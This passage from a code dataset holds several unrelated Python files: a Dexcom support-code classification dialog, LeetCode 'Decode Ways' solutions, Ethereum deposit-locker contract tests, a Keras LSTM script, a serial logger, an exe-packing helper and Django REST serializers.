items'] = 'Inquiry'\n self.data['612 Request For Follow up Call if Lost Equipment is Found'] = 'Inquiry'\n self.data['613 Request For Changes/Improvement in Software'] = 'Inquiry'\n self.data['614 Request For Further Training/CES Contact Info'] = 'Inquiry'\n self.data['615 Request For Alarms to be Louder/Adjustable'] = 'Inquiry'\n self.data['616 Request For Event Details to Be Viewable on Receiver'] = 'Inquiry'\n self.data['617 Request For USB/Car Charger'] = 'Inquiry'\n self.data['618 Request For R2 to be Smaller'] = 'Inquiry'\n self.data['619 Request For Changes/Improvement on Cables'] = 'Inquiry'\n self.data['620 Request For Adhesive Recommendations'] = 'Inquiry'\n self.data['621 Request For a Sensor Replacement Since PT Had a Hardware Failure '] = 'Inquiry'\n self.data['622 Request to Support an Unapproved Product '] = 'Inquiry'\n self.data['707 Activate Clinical Features'] = 'Inquiry'\n self.data['708 Educate: Product Water Resistance'] = 'Inquiry'\n self.data['709 Educate: Calibration Requirements'] = 'Inquiry'\n self.data['710 Educate: Why The Arrow is Not Displayed'] = 'Inquiry'\n self.data['711 Educate: Charts in Software'] = 'Inquiry'\n self.data['712 Educate: Device Use During Medical Procedures'] = 'Inquiry'\n self.data['713 Educate: Device Use in Combination With Certain Medications'] = 'Inquiry'\n self.data['714 Educate: Inaccuracy When The Difference Between Sensor and BG Meter Readings is Less Than 20%'] = 'Inquiry'\n self.data['715 Educate: Sensor Location'] = 'Inquiry'\n self.data['716 Educate: Traveling With Dexcom System'] = 'Inquiry'\n self.data['717 Educate: Storage Conditions/Extreme Temperatures'] = 'Inquiry'\n self.data['718 Educate: Sensor Expiration Date'] = 'Inquiry'\n self.data['720 Educate: Materials Used in Production'] = 'Inquiry'\n self.data['721 Educate: Blinded Mode'] = 'Inquiry'\n self.data['777 Blatant Water/User Related 
Damage'] = 'Inquiry'\n self.data['800 Customer Felt Re-Order Rep Did Not Assist Them'] = 'Inquiry'\n self.data['801 Customer Felt Tech Support Rep Did Not Assist Them'] = 'Inquiry'\n self.data['802 Customer Felt Territory Sales Manager Did Not Assist Them'] = 'Inquiry'\n self.data['803 Customer Felt Clinical Education Specialist Did Not Assist Them'] = 'Inquiry'\n self.data['804 Customer Felt Sales Assistant Rep Did Not Assist Them'] = 'Inquiry'\n self.data['805 Field Rep Asked That Documentation Be Entered About PT'] = 'Inquiry'\n self.data['806 Field Rep Asked For Notes on This PT'] = 'Inquiry'\n self.data['807 PT Called With CS question. Transferred to CS.'] = 'Inquiry'\n self.data['809 Educate: Exporting Data From Patient Data Software'] = 'Inquiry'\n self.data['810 Educate: Enter BG in 15 Min. Alert'] = 'Inquiry'\n self.data['811 Educate: Enter BG in 1 Hr. Alert'] = 'Inquiry'\n self.data['812 Educate: Receiver Not Found Using Patient Data Software'] = 'Inquiry'\n self.data['813 Educate: Installing Patient Data Software'] = 'Inquiry'\n self.data['814 Educate: General Use - Patient Data Software'] = 'Inquiry'\n self.data['815 Educate: Printing Graphs, Charts, Information - Patient Data Software'] = 'Inquiry'\n self.data['816 Request for Patient data Software to be Mailed '] = 'Inquiry'\n self.data['817 Mobile App Feedback'] = 'Inquiry'\n self.data['818 Educate: Alert Profiles'] = 'Inquiry'\n self.data['819 Potential Inquiry; Attempted to Reach Customer at Request of VM, CS, Field - Unsure of Issue '] = 'Inquiry'\n self.data['820 Educate: No Antenna Icon For Start of Warm Up Period'] = 'Inquiry'\n self.data['850 Unable to Locate Invitation Email'] = 'Inquiry'\n self.data['851 Educate: Share System - Presale'] = 'Inquiry'\n self.data['852 Educate: Share Cloud'] = 'Inquiry'\n self.data['853 Educate: Share Glucomonster'] = 'Inquiry'\n self.data['854 Educate: Smart Device Airplane Mode/No Internet Connection'] = 'Inquiry'\n self.data['855 Educate: Smart Device Do Not Disturb Mode'] = 'Inquiry'\n self.data['856 Educate: Bluetooth Technology'] = 'Inquiry'\n self.data['857 Educate: Jailbroken Mobile Device'] = 'Inquiry'\n self.data['858 Educate: Mobile Data Connections'] = 'Inquiry'\n self.data['859 Educate: Pairing'] = 'Inquiry'\n self.data['860 Educate: Creating a Dexcom Share Account'] = 'Inquiry'\n self.data['861 Educate: Followers Settings on The Share App'] = 'Inquiry'\n self.data['862 Educate: Simultaneous Voice and Data From Mobile Carrier'] = 'Inquiry'\n self.data['863 Educate: Share Getting Started Process'] = 'Inquiry'\n self.data['864 Educate: Setting up Cradle'] = 'Inquiry'\n self.data['865 Educate: Inviting Follower(s) in Share App'] = 'Inquiry'\n self.data['866 Educate: Editing Follower(s) in Share App'] = 'Inquiry'\n self.data['867 Educate: Removing Follower(s) in Share App'] = 'Inquiry'\n self.data['868 Educate: Pairing New Smart Device'] = 'Inquiry'\n self.data['869 Educate: Replacing Cradle'] = 'Inquiry'\n self.data['870 Educate: Receiving Invitation Email'] = 'Inquiry'\n self.data['871 Educate: Follower Dashboard'] = 'Inquiry'\n self.data['872 Educate: Follower Trend Screen'] = 'Inquiry'\n self.data['873 Educate: Cradle And USB Maintenance'] = 'Inquiry'\n self.data['874 Educate: Forgot my Username/Password'] = 'Inquiry'\n self.data['875 Educate: Locked Out of my Account'] = 'Inquiry'\n self.data['876 Educate: Replacing my Smart Device'] = 'Inquiry'\n self.data['877 Educate: Replacing my Receiver'] = 'Inquiry'\n self.data['878 Educate: Installing Share App'] = 'Inquiry'\n 
self.data['879 Educate: Installing Follower App'] = 'Inquiry'\n self.data['880 Request For Other Mobile Device Compatibility'] = 'Inquiry'\n self.data['881 Request For Changes/Improvements to Share Hardware'] = 'Inquiry'\n self.data['882 Request For Changes/Improvements to Share App'] = 'Inquiry'\n self.data['883 Request For Changes/Improvements to Follower App'] = 'Inquiry'\n self.data['884 Educate: Time Delay Value'] = 'Inquiry'\n self.data['885 Educate: WIC (Window Imaging Component) Required For Installation Update Tool'] = 'Inquiry'\n self.data['886 Educate: No Available Updates For The Attached Receiver'] = 'Inquiry'\n self.data['887 Educate: Patient Inquiring How to Update Multiple Receivers'] = 'Inquiry'\n self.data['888 Educate: Patient Inquiring How to Stop an Update'] = 'Inquiry'\n self.data['889 Educate: Update Tool Saying \"Another Copy of This Application is Already Running.\"'] = 'Inquiry'\n self.data['890 Request For Changes/Improvements to Update Tool'] = 'Inquiry'\n self.data['891 Educate: Downloading/Installing Update Tool'] = 'Inquiry'\n self.data['892 Educate: Access Rights'] = 'Inquiry'\n self.data['893 Educate: System Requirements for Update Tool'] = 'Inquiry'\n self.data['894 Educate: Updating Receiver'] = 'Inquiry'\n self.data['895 Educate: Authorization Code'] = 'Inquiry'\n self.data['896 Educate: Options'] = 'Inquiry'\n self.data['897 Educate: Portrait Installation'] = 'Inquiry'\n self.data['898 Educate: Software Connectivity'] = 'Inquiry'\n self.data['899 Educate: Upload Receiver'] = 'Inquiry'\n self.data['900 Educate: Downloading/Saving Reports'] = 'Inquiry'\n self.data['901 Educate: Emailing Reports'] = 'Inquiry'\n self.data['902 Educate: Portrait Compatibility'] = 'Inquiry'\n self.data['903 Educate: CGM Readings Not Displaying During Vibe Insulin Delivery Suspension'] = 'Inquiry'\n self.data['904 Educate: Pairing Receiver to Share App'] = 'Inquiry'\n self.data['905 Educate: Health Kit Feature in Share App'] = 'Inquiry'\n self.data['906 Educate: Trend Graph Feature in Share App'] = 'Inquiry'\n self.data['907 Educate: Apple Watch System Requirements'] = 'Inquiry'\n self.data['908 Educate: Apple Watch Dashboard Screen Features'] = 'Inquiry'\n self.data['909 Educate: Apple Watch Trend Detail Screen Features'] = 'Inquiry'\n self.data['910 Educate: Apple Watch Glance Screen Features'] = 'Inquiry'\n self.data['911 Educate: Apple Watch Notification Features'] = 'Inquiry'\n self.data['912 Request For Changes/Improvements to 2ndary Display Item (Apple Watch)'] = 'Inquiry'\n self.data['913 Educate: Haptic'] = 'Inquiry'\n self.data['914 Educate: Smart Device Compatibility'] = 'Inquiry'\n self.data['915 Educate: Apple Watch Sleep Screen'] = 'Inquiry'\n self.data['916 Educate: Primary Display Between iPhone And Watch'] = 'Inquiry'\n self.data['917 Educate: Apple Watch Charging'] = 'Inquiry'\n self.data['918 Educate: Android Notification Features'] = 'Inquiry'\n self.data['919 Educate: Application setting vs. 
System settings'] = 'Inquiry'\n self.data['920 Educate: Sharing code'] = 'Inquiry'\n self.data['921 Educate: Discrepancy Between Displays'] = 'Inquiry'\n self.data['922 Educate: Adjusting Clock on Smart Device'] = 'Inquiry'\n self.data['923 Educate: Device storage requirements'] = 'Inquiry'\n self.data['924 Educate: message \"check G5 mobile app\" displayed on Apple Watch'] = 'Inquiry'\n self.data['925 Educate: Widget Usage'] = 'Inquiry'\n\n self.listWidget.addItems(self.data.keys())\n\n def on_lineEdit_textChange(self, text):\n def code():\n if text.trimmed() != '':\n matchingItems = self.listWidget.findItems(text, QtCore.Qt.MatchStartsWith)\n if len(matchingItems) > 0:\n self.listWidget.setCurrentItem(matchingItems[0])\n\n common.run_scary_code(self, code, show_wait_cursor = False)\n\n def on_listWidget_currentItemChange(self, item):\n def code():\n if self.data[str(item.text())] == 'Complaint':\n self.complaintRadioButton.setChecked(QtCore.Qt.Checked)\n else:\n self.inquiryRadioButton.setChecked(QtCore.Qt.Checked)\n\n common.run_scary_code(self, code, show_wait_cursor = False)\n\n def on_buttonBox_accept(self):\n super(SelectClassificationCodeDialog, self).accept()\n\n def on_buttonBox_reject(self):\n super(SelectClassificationCodeDialog, self).reject()\n","sub_path":"widget/dialogs/selectClassificationCode/cb/selectClassificationCodeDialog.py","file_name":"selectClassificationCodeDialog.py","file_ext":"py","file_size_in_byte":25911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"386389411","text":"class Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n def createDPtable(s):\n table = [[False] * len(s) for _ in range(len(s))]\n\n for i in range(len(s)):\n if s[i] != '0':\n table[i][i] = True\n\n # length 2\n for i in range(len(s) - 1):\n substring = s[i:i + 2]\n if substring[0] != '0' and int(substring) >= 1 and int(substring) <= 26:\n table[i][i + 1] = True\n\n return table\n\n def backtrack(s, start, count):\n if start == len(s):\n count += 1\n return count\n\n for i in range(start, len(s)):\n if i - start <= 1 and dp[start][i]:\n count = backtrack(s, i + 1, count)\n return count\n\n if not s:\n return 0\n\n dp = createDPtable(s)\n count = backtrack(s, 0, 0)\n return count\n\nprint(Solution().numDecodings(\"2324\"))\n\n\nclass Solution2(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n def numDecodingsHelper(s, cache):\n\n if len(s) == 0:\n return 1\n\n if cache[len(s)]:\n return cache[len(s)]\n\n # not in cache, so calculate by summing the tails\n sum = 0\n\n for headsize in range(1, len(s) + 1):\n head = s[:headsize]\n tail = s[headsize:]\n\n if int(head) > 26 or head[0] == \"0\":\n break\n\n sum += numDecodingsHelper(tail, cache)\n\n cache[len(s)] = sum\n print(cache)\n return sum\n\n if not s:\n return 0\n return numDecodingsHelper(s, [0] * (len(s) + 1))\n\n\nprint(Solution2().numDecodings(\"23242221\"))\n\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n ways = [0] * (len(s) + 1)\n\n # base cases\n\n ways[-1] = 1\n ways[-2] = 1 if s[-1] != '0' else 0\n\n # Very similar to fibonacci\n\n for i in range(len(s) - 2, -1, -1):\n if s[i] == '0':\n continue\n if int(s[i:i + 2]) <= 26:\n ways[i] = ways[i + 1] + ways[i + 2]\n else:\n ways[i] = ways[i + 1]\n\n return ways[0]\n\n\n\n","sub_path":"91. Decode Ways.py","file_name":"91. 
Decode Ways.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159144096","text":"#! pytest\n\nimport pytest\nimport eth_tester.exceptions\n\n\n@pytest.fixture()\ndef deposit_contract_on_longer_chain(\n chain_cleanup, deposit_locker_contract_with_deposits, web3, chain\n):\n \"\"\"gives a chain long enough to be able to withdraw the deposit of the deposit contract\"\"\"\n contract = deposit_locker_contract_with_deposits\n\n block_to_reach = contract.functions.releaseBlockNumber().call()\n current_block = web3.eth.blockNumber\n to_mine = block_to_reach - current_block\n\n chain.mine_blocks(to_mine)\n\n return contract\n\n\ndef test_init_already_initialized(deposit_locker_contract, accounts):\n \"\"\"verifies that we cannot call the init function twice\"\"\"\n contract = deposit_locker_contract\n validator_contract_address = accounts[0]\n release_block_number = 100\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.init(\n release_block_number, validator_contract_address\n ).transact({\"from\": accounts[0]})\n\n\ndef test_init_not_owner(non_initialised_deposit_locker_contract_session, accounts):\n contract = non_initialised_deposit_locker_contract_session\n validator_contract_address = accounts[0]\n release_block_number = 100\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.init(\n release_block_number, validator_contract_address\n ).transact({\"from\": accounts[1]})\n\n\ndef test_init_passed_realease_block(\n non_initialised_deposit_locker_contract_session, accounts, web3\n):\n contract = non_initialised_deposit_locker_contract_session\n validator_contract_address = accounts[0]\n release_block = web3.eth.blockNumber - 1\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.init(release_block, validator_contract_address).transact(\n {\"from\": web3.eth.defaultAccount}\n )\n\n\ndef test_owner_after_init(deposit_locker_contract):\n contract = deposit_locker_contract\n\n assert (\n contract.functions.owner().call()\n == \"0x0000000000000000000000000000000000000000\"\n )\n\n\ndef test_deposit(deposit_locker_contract, accounts, web3):\n contract = deposit_locker_contract\n\n pre_balance = web3.eth.getBalance(accounts[2])\n assert contract.functions.deposits(accounts[2]).call() == 0\n\n deposit = 10000000\n tx = contract.functions.deposit(accounts[2]).transact(\n {\"from\": accounts[2], \"value\": deposit}\n )\n gas_used = web3.eth.getTransactionReceipt(tx).gasUsed\n\n assert contract.functions.deposits(accounts[2]).call() == deposit\n new_balance = web3.eth.getBalance(accounts[2])\n\n assert pre_balance - new_balance == deposit + gas_used\n\n\ndef test_withdraw(deposit_contract_on_longer_chain, accounts, web3, deposit_amount):\n \"\"\"test whether we can withdraw after block 10\"\"\"\n contract = deposit_contract_on_longer_chain\n\n pre_balance = web3.eth.getBalance(accounts[0])\n assert contract.functions.deposits(accounts[0]).call() == deposit_amount\n\n tx = contract.functions.withdraw().transact({\"from\": accounts[0]})\n gas_used = web3.eth.getTransactionReceipt(tx).gasUsed\n\n assert contract.functions.deposits(accounts[0]).call() == 0\n new_balance = web3.eth.getBalance(accounts[0])\n\n assert new_balance - pre_balance == deposit_amount - gas_used\n\n\ndef test_withdraw_too_soon(\n deposit_locker_contract_with_deposits, accounts, deposit_amount\n):\n \"\"\"test whether we can withdraw before 
releaseBlockNumber have been mined\"\"\"\n contract = deposit_locker_contract_with_deposits\n\n assert contract.functions.deposits(accounts[0]).call() == deposit_amount\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.withdraw().transact({\"from\": accounts[0]})\n\n\ndef test_deposit_not_initialised(\n non_initialised_deposit_locker_contract_session, accounts, deposit_amount\n):\n contract = non_initialised_deposit_locker_contract_session\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.deposit(accounts[0]).transact(\n {\"from\": accounts[0], \"value\": deposit_amount}\n )\n\n\ndef test_withdraw_not_initialised(\n non_initialised_deposit_locker_contract_session, accounts\n):\n contract = non_initialised_deposit_locker_contract_session\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.withdraw().transact({\"from\": accounts[0]})\n\n\ndef test_slash_not_initialised(\n non_initialised_deposit_locker_contract_session, accounts\n):\n contract = non_initialised_deposit_locker_contract_session\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.slash(accounts[0]).transact({\"from\": accounts[0]})\n\n\ndef test_event_deposit(deposit_locker_contract, accounts, web3):\n contract = deposit_locker_contract\n\n latest_block_number = web3.eth.blockNumber\n\n deposit = 10000000\n contract.functions.deposit(accounts[0]).transact(\n {\"from\": accounts[0], \"value\": deposit}\n )\n\n event = contract.events.Deposit.createFilter(\n fromBlock=latest_block_number\n ).get_all_entries()[0][\"args\"]\n\n assert event[\"depositOwner\"] == accounts[0]\n assert event[\"value\"] == deposit\n\n\ndef test_event_withdraw(\n deposit_contract_on_longer_chain, malicious_non_validator_address, web3\n):\n contract = deposit_contract_on_longer_chain\n\n # Use the malicious_non_validator_address, since he has not deposit already.\n\n latest_block_number = web3.eth.blockNumber\n\n deposit = 10000000\n contract.functions.deposit(malicious_non_validator_address).transact(\n {\"from\": malicious_non_validator_address, \"value\": deposit}\n )\n\n contract.functions.withdraw().transact({\"from\": malicious_non_validator_address})\n\n event = contract.events.Withdraw.createFilter(\n fromBlock=latest_block_number\n ).get_all_entries()[0][\"args\"]\n\n assert event[\"withdrawer\"] == malicious_non_validator_address\n assert event[\"value\"] == deposit\n\n\ndef test_event_slash(\n deposit_locker_contract_with_deposits,\n validator_slasher_contract,\n sign_two_equivocating_block_header,\n malicious_validator_address,\n malicious_validator_key,\n deposit_amount,\n web3,\n):\n\n latest_block_number = web3.eth.blockNumber\n\n two_signed_blocks_equivocated_by_malicious_validator = sign_two_equivocating_block_header(\n malicious_validator_key\n )\n\n validator_slasher_contract.functions.reportMaliciousValidator(\n two_signed_blocks_equivocated_by_malicious_validator[0].unsignedBlockHeader,\n two_signed_blocks_equivocated_by_malicious_validator[0].signature,\n two_signed_blocks_equivocated_by_malicious_validator[1].unsignedBlockHeader,\n two_signed_blocks_equivocated_by_malicious_validator[1].signature,\n ).transact()\n\n event = deposit_locker_contract_with_deposits.events.Slash.createFilter(\n fromBlock=latest_block_number\n ).get_all_entries()[0][\"args\"]\n\n assert event[\"validator\"] == malicious_validator_address\n assert event[\"slashedValue\"] == 
deposit_amount\n","sub_path":"contracts/tests/test_deposit_locker.py","file_name":"test_deposit_locker.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330277130","text":"\n# coding: utf-8\n\n# In[1]:\n\n__author__ = 'aqeel'\n'''Train and evaluate a simple MLP on the Souq.com Reviews newswire topic classification task.\nGPU run command:\n THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python examples/NNClassifiyReviews.py\nCPU run command:\n python examples/NNClassifiyReviews.py\n'''\nimport numpy as np\nfrom keras.models import Sequential, load_model,Model\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.utils import np_utils\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint\nfrom keras.layers.recurrent import LSTM\nimport random\nimport math\nimport pandas as pd\nimport re\n\n#For the baseline\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nimport matplotlib.pyplot as plt\nfrom ALutils import Calculate_Score,RANK\nnp.random.seed(1377)\n\n\n# ### Prepare the data\n\n# In[2]:\n\ntrain = pd.read_csv('../Data/train.csv')\nftest = pd.read_csv('../Data/test.csv')\n#ftest[ftest.columns[[0]+[i for i in range(10,18)]]]\n#train.head()\ndef GetData(ds):#, splitper=0.2): Splitter is stopped \n np.random.seed(1337)\n #Convert The Percentage to split point\n splitper = 50 #int(math.floor(splitper * ds.shape[0] + 1))\n\n #Shuffle the list\n #Shuffle is stopped so we can get stable measurements\n #ds = ds.iloc[np.random.permutation(len(ds))]\n \n #Get tarin,test\n ls = [i for i in range(10,18)]\n ls+=[0,2]\n x_train = ds.iloc[splitper:][np.delete(ds.columns, ls)]\n y_train = ds.iloc[splitper:][ds.columns[10:18]]\n x_test = ds.iloc[:splitper][np.delete(ds.columns, ls)]\n y_test = ds.iloc[:splitper][ds.columns[10:18]]\n return (x_train.as_matrix(),y_train.as_matrix()),(x_test.as_matrix(),y_test.as_matrix()) \n\n\n# In[3]:\n\n#1-inf\nbatch_size = 1\n#1-inf\nnb_epoch = 1000\n#Done\n#SGD, RMSprop, Adagrad, Adadelta, Adam, Adamax\ntheoptimizer = 'adam'\n#DONE\n#1-inf\nlayernodes = 128\n#DONE\n#0.1-0.9\nthedropout =0.5\n#DONE\n#softmax,softplus,relu,tanh,sigmoid,hard_sigmoid,linear,\nFirstActivation = 'relu'\nSecondActivation='sigmoid'\n#DONE\n#mean_squared_error / mse,root_mean_squared_error / rmse,mean_absolute_error / mae,mean_absolute_percentage_error / mape\n#mean_squared_logarithmic_error / msle,squared_hinge, hinge,binary_crossentropy: Also known as logloss,categorical_crossentropy: Also known as multiclass logloss. 
Note: using this objective requires that your labels are binary arrays of shape (nb_samples, nb_classes).\n#poisson: mean of (predictions - targets * log(predictions))# cosine_proximity: the opposite (negative) of the mean cosine proximity between predictions and targets.\ntheloss='mse'\n#======================\nprint('Loading data...')\n\n#(X_train, y_train), (X_test, y_test) =GetData()\n(x_train,y_train),(x_test,y_test) = GetData(train)\n#y_train = y_train[:,0]\n#y_test = y_test[:,0]\nprint('train:',x_train.shape,y_train.shape)\nprint('test: ',x_test.shape,y_test.shape)\n\nx_train = np.reshape(x_train,(x_train.shape[0],1,x_train.shape[1]))\nx_test = np.reshape(x_test,(x_test.shape[0],1,x_test.shape[1]))\nmodel = Sequential() \nmodel.add(LSTM(300,input_shape=(1,24),return_sequences=True,dropout_W=0.2)) \nmodel.add(LSTM(200,return_sequences=True,dropout_W=0.2)) \nmodel.add(LSTM(100,return_sequences=False,dropout_W=0.2)) \nmodel.add(Dense(50,init='normal')) \nmodel.add(Dense(8,init='normal')) \nmodel.add(Activation(\"linear\")) \nmodel.compile(loss=\"mean_squared_error\", optimizer=\"rmsprop\") \n\n\n# In[5]:\n\nearly_stopping = EarlyStopping(monitor='val_loss', patience=42)\nmodel_checkpoint = ModelCheckpoint('output_files/Model_LSTM_{epoch:02d}-{val_loss:.2f}.h5', monitor='val_loss', verbose=0, save_best_only=True, save_weights_only=False, mode='min')\nhistory = model.fit(x_train, y_train, nb_epoch=nb_epoch,callbacks=[early_stopping, model_checkpoint], batch_size=batch_size,verbose=1, validation_split=0.1)\n\n# In[6]:\n\norg = RANK(y_test)\nprint('Perfect Score:',Calculate_Score(org,org))\n#bm = load_model('output_files/t0/Model_01-106548.69.h5')\n#model = load_model('output_files/Model_NN:2_67-0.12.h5')\npred = model.predict(x_test)\npred = RANK(pred)\nprint('Current Score:',Calculate_Score(pred,org))\n","sub_path":"AQEEL_MODELS/LSTM2.py","file_name":"LSTM2.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"232043140","text":"print(\"HERE\")\nimport serial\nprint(\"HERE\")\nimport csv\nimport sys\nimport glob\n\n\n#def enum_ports():\n#\tports = ['COM%s' % (i + 1) for i in range(256)]\n#\n#\tresult = []\n#\tfor port in ports:\n#\t\ttry:\n#\t\t\ts = serial.Serial(port)\n#\t\t\ts.close()\n#\t\t\tresult.append(port)\n#\t\texcept (OSError, serial.SerialException):\n#\t\t\tpass\n#\treturn result\n\nprint(\"HERE\")\n\n#### COM Setup #########################################################################\nCOMPORT = 22\t\nBAUDRATE = 256000\n#COM_PORT = int(input(\"Enter COM port Number: \"))\n#print(\"\\n\\r\\n\\r\")\n#print(\"Available ports:\")\n#print(enum_ports())\n#print(\"\\n\\n\\r\")\n\nprint(\"HERE\")\n#try:\ncom = serial.Serial(port=(COMPORT-1),baudrate=BAUDRATE,timeout = 0.01)\nprint (\"Connection started on %s\\n at %s kbps\"\n\t\t \"----------------------------------------------------------------------\\n\"%(com.name, BAUDRATE/1000))\n#except:\n#\tprint(\"CONNECTION FAILED. 
EXITING...\")\n#\tsys.exit(0)\n### COM Setup END #####################################################################\n\n#Packet\n# C-interp \tuint16_t voltage, uint16_t current, char range, \"\\n\"\n# Py-Interp\tchar, char, char, char, char, '\\n'\nprint(\"HERE\")\nTXSIZE = 200\nresultsArray = []\ncom.readline()\nfor i in range(0,TXSIZE):\n\tprint(\"HERE\")\n\tresultsArray.append(list(com.readline()))\t# Read lines until transmit period is over\n\nwith open(\"loggingFile.csv\", 'a', newline='') as file:\n\tprint(\"HERE\")\n\tfor j in resultsArray:\n\t\toutput = csv.writer(file)\n\t\toutput.writerow([ ord(j[0])<<8+ord(j[1]) , ord(j[2])<<8+ord(j[3]) , j[4] ])\n\t\tfile.close()","sub_path":"Python/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587139526","text":"#coding=cp936\nimport os\nimport shutil\nimport win32api\n\n\ndef getFileVersion(file_name):\n info = win32api.GetFileVersionInfo(file_name, os.sep)\n ms = info['FileVersionMS']\n ls = info['FileVersionLS']\n version = '%d.%d.%d.%d' % (win32api.HIWORD(ms), win32api.LOWORD(ms), win32api.HIWORD(ls), win32api.LOWORD(ls))\n return version\n\nif not os.path.exists('UpxApp'):\n os.makedirs('UpxApp')\nshutil.copy('UniEntity.exe','UpxApp/UniEntity.exe')\nos.system('upx -9 UpxApp/UniEntity.exe')\nos.chdir('UpxApp')\n\n\n#os.system('rar a -df UpxApp/SqlSrv/PRMS UpxApp/SqlSrv/PRMS.exe');\n#os.system('rar a UpxApp/SqlSrv/PRMS UpxApp/SqlSrv/PRMS.exe');\nrarcmd='rar a UniEntity_V%s.rar UniEntity.exe' % getFileVersion('UniEntity.exe')\nos.system(rarcmd)\n","sub_path":"2012_06_19_15_45_32_D7有关UniEntity的开发/UpxIt.py","file_name":"UpxIt.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92176044","text":"# -*- coding: utf-8 -*-\n\nimport urllib\nimport hashlib\nimport re\nimport time\n\ndef urlquote(s):\n\treturn urllib.quote(s)\n\t\ndef deepmerge(target,source):\n\tfor k in target :\n\t\tif k in source:\n\t\t\tif isinstance( target[k] ,dict ):\n\t\t\t\tif isinstance( source[k] , dict ):\n\t\t\t\t\tdeepmerge(target[k],source[k])\n\t\t\t\telse:\n\t\t\t\t\ttarget[k] = source[k]\n\t\t\telse:\n\t\t\t\ttarget[k] = source[k]\n\ndef md5sum(s):\n\tm = hashlib.md5()\n\tm.update(s)\n\treturn m.hexdigest()\n\ndef toInt(s,default=None):\n\tif isinstance(s,(int,long)):\n\t\treturn s\n\tif isinstance(s,str):\n\t\tre_num = r'^-?[0-9]*$'\n\t\treg = re.compile(re_num)\n\t\tif reg.match(s):\n\t\t\treturn int(s)\n\t\telse:\n\t\t\treturn default\n\ndef isInt(v):\n\treturn isinstance(v,(int,long))\n\ndef timeStamp2Str(t):\n\treturn time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(t))\n\ndef timeStamp2Short(t):\n\tnow = time.localtime()\n\tsti = time.localtime(t)\n\t\n\tif now.tm_year != sti.tm_year:\n\t\treturn time.strftime('%Y-%m-%d',sti)\n\telif now.tm_mon != sti.tm_mon or now.tm_mday != sti.tm_mday:\n\t\treturn time.strftime('%m月%d日',sti)\n\telse:\n\t\treturn time.strftime('%H:%M',sti)\n","sub_path":"drape/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381570372","text":"import re\n\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework import serializers\nfrom rest_framework.reverse import reverse\n\nfrom workatolist.models import Channel, Category\n\n\nclass 
UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('url', 'username', 'email', 'groups')\n\n\nclass GroupSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Group\n fields = ('url', 'name')\n\n\nclass ChannelSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Channel\n fields = ('url', 'name', 'slug')\n extra_kwargs = {\n 'url': {'view_name': 'channel-detail', 'lookup_field': 'slug'},\n }\n\n\nclass CategorySlugRelatedField(serializers.SlugRelatedField):\n\n def to_internal_value(self, value):\n assert isinstance(value, str), \\\n \"value is not a string: {0}\".format(value)\n m = re.search(r\"/(?P[\\w-]+)/$\", value)\n if m:\n the_category = Category.objects.filter(\n slug=m.groupdict()['slug']).first()\n return the_category\n elif value:\n the_category = Category.objects.filter(slug=value).first()\n if the_category:\n return the_category\n else:\n return None\n\n def to_representation(self, value):\n if value:\n request = self.context['request']\n url = reverse(\n 'category-detail', args=[value.slug], request=request)\n return url\n return None\n\n\nclass ChannelSlugRelatedField(serializers.SlugRelatedField):\n\n def to_internal_value(self, value):\n assert isinstance(value, str), \\\n \"value is not a string: {0}\".format(value)\n m = re.search(r\"/(?P[\\w-]+)/$\", value)\n if m:\n the_channel = Channel.objects.filter(\n slug=m.groupdict()['slug']).first()\n return the_channel\n elif value:\n the_channel = Channel.objects.filter(slug=value).first()\n if the_channel:\n return the_channel\n else:\n return None\n\n def to_representation(self, value):\n if value.slug:\n request = self.context['request']\n url = reverse(\n 'channel-detail', args=[value.slug], request=request)\n return url\n return None\n\n\nclass SubCategory(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = ('slug', 'name')\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n url = serializers.SerializerMethodField('category_url')\n parent = CategorySlugRelatedField(\n many=False,\n read_only=False,\n slug_field='slug',\n queryset=Category.objects.all(),\n required=False,\n allow_null=True,\n )\n channel = ChannelSlugRelatedField(\n many=False,\n read_only=False,\n slug_field='slug',\n queryset=Channel.objects.all(),\n # source='channel.id',\n )\n\n def category_url(self, 